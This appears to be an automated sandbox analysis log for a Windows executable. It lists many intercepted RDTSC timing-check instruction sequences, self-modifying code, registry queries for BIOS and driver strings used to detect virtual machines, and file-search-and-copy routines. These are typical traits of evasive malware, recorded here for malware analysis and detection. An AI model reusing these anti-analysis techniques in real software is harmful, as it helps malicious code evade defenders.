                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DAD51 second address: 6DAD61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F46B8B98B06h 0x0000000a pop edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DAD61 second address: 6DAD93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F46B8DCA1A7h 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jg 00007F46B8DCA196h 0x0000001e push esi 0x0000001f pop esi 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DAE92 second address: 6DAEBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8B98B17h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007F46B8B98B0Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DAEBD second address: 6DAF01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F46B8DCA1A9h 0x00000008 jc 00007F46B8DCA196h 0x0000000e jnp 00007F46B8DCA196h 0x00000014 popad 0x00000015 jmp 00007F46B8DCA19Dh 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F46B8DCA19Ah 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DAF01 second address: 6DAF0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F46B8B98B06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB19E second address: 6DB1A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB1A2 second address: 6DB1B9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F46B8B98B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F46B8B98B0Dh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F019E second address: 6F01AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F46B8DCA196h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F01AD second address: 6F01B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EFB6A second address: 6EFB7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F46B8DCA19Fh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F50C4 second address: 6F50CA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70232A second address: 702334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F46B8DCA196h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702334 second address: 70234C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F46B8B98B06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F46B8B98B0Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70234C second address: 702356 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708A72 second address: 708A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F46B8B98B12h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708A8A second address: 708A9C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jne 00007F46B8DCA196h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708C18 second address: 708C4A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F46B8B98B0Dh 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jng 00007F46B8B98B06h 0x00000017 pushad 0x00000018 popad 0x00000019 jl 00007F46B8B98B06h 0x0000001f jmp 00007F46B8B98B0Ah 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709032 second address: 709037 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70943D second address: 709441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70D43B second address: 70D452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F46B8DCA196h 0x0000000a popad 0x0000000b pushad 0x0000000c ja 00007F46B8DCA196h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7108EF second address: 7108F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7108F5 second address: 7108F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7108F9 second address: 710933 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F46B8B98B06h 0x00000009 pop esi 0x0000000a jns 00007F46B8B98B0Ch 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007F46B8B98B19h 0x00000018 jc 00007F46B8B98B0Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710933 second address: 71093F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71093F second address: 710943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710943 second address: 71094D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F46B8DCA196h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F632 second address: 61F637 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F637 second address: 61F63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712EC3 second address: 712ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712ECA second address: 712F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F46B8DCA1A5h 0x0000000b popad 0x0000000c jmp 00007F46B8DCA1A6h 0x00000011 popad 0x00000012 pushad 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F46B8DCA19Eh 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712F16 second address: 712F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712F1A second address: 712F1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714740 second address: 71474A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71474A second address: 714750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714750 second address: 71475A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F46B8B98B06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A1E3 second address: 72A1ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F46B8DCA196h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A1ED second address: 72A1FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F46B8B98B06h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A1FC second address: 72A203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A07D second address: 72A09A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F46B8B98B17h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A09A second address: 72A0A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CAED second address: 72CB08 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F46B8B98B15h 0x00000008 jmp 00007F46B8B98B0Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CB08 second address: 72CB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CB0C second address: 72CB22 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F46B8B98B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F46B8B98B0Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CB22 second address: 72CB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CC9E second address: 72CCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F46B8B98B08h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CCAB second address: 72CCB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F46B8DCA196h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CCB5 second address: 72CCB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CCB9 second address: 72CCF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F46B8DCA1A2h 0x00000013 pop ebx 0x00000014 push ecx 0x00000015 jns 00007F46B8DCA196h 0x0000001b jmp 00007F46B8DCA1A1h 0x00000020 pop ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CCF7 second address: 72CCFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CCFD second address: 72CD01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CD01 second address: 72CD18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8B98B0Dh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CD18 second address: 72CD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C604 second address: 73C61F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F46B8B98B0Eh 0x0000000c jng 00007F46B8B98B06h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C61F second address: 73C62F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F46B8DCA196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C62F second address: 73C635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C635 second address: 73C63E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C63E second address: 73C642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C642 second address: 73C646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C646 second address: 73C64C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CBCC second address: 73CBD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D04D second address: 73D053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D053 second address: 73D061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D061 second address: 73D098 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F46B8B98B06h 0x00000008 jmp 00007F46B8B98B16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F46B8B98B0Fh 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 pop eax 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D1E9 second address: 73D209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D209 second address: 73D20D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D39B second address: 73D3BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A4h 0x00000007 jc 00007F46B8DCA196h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D3BE second address: 73D3D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F46B8B98B13h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D54B second address: 73D551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D551 second address: 73D55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F46B8B98B06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7405C9 second address: 740660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F46B8DCA1A1h 0x00000010 nop 0x00000011 mov edx, dword ptr [ebp+1244CC6Eh] 0x00000017 push 00000004h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F46B8DCA198h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D2DB4h], edx 0x00000039 call 00007F46B8DCA199h 0x0000003e push eax 0x0000003f jmp 00007F46B8DCA1A2h 0x00000044 pop eax 0x00000045 push eax 0x00000046 jmp 00007F46B8DCA1A7h 0x0000004b mov eax, dword ptr [esp+04h] 0x0000004f push ecx 0x00000050 push eax 0x00000051 push edx 0x00000052 jnp 00007F46B8DCA196h 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740660 second address: 74067F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F46B8B98B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F46B8B98B10h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74067F second address: 740684 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740684 second address: 7406AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F46B8B98B16h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7406AB second address: 7406BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA19Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7408AE second address: 7408B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7408B2 second address: 7408B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7408B6 second address: 7408C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jc 00007F46B8B98B06h 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40268 second address: 4D4026C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4026C second address: 4D40270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40270 second address: 4D40276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40276 second address: 4D402F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F46B8B98B12h 0x00000009 or si, F2B8h 0x0000000e jmp 00007F46B8B98B0Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F46B8B98B18h 0x0000001a sbb ecx, 46062D18h 0x00000020 jmp 00007F46B8B98B0Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F46B8B98B14h 0x00000032 add esi, 4B1E1778h 0x00000038 jmp 00007F46B8B98B0Bh 0x0000003d popfd 0x0000003e push ecx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40343 second address: 4D40348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40348 second address: 4D40379 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F46B8B98B0Eh 0x00000008 jmp 00007F46B8B98B12h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40379 second address: 4D403BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F46B8DCA1A0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F46B8DCA1A7h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C723 second address: 66C727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C727 second address: 66C731 instructions: 0x00000000 rdtsc 0x00000002 je 00007F46B8DCA196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C731 second address: 66C737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4C1B5F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 65D904 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_002738B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00274910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00274910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0026DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0026E430
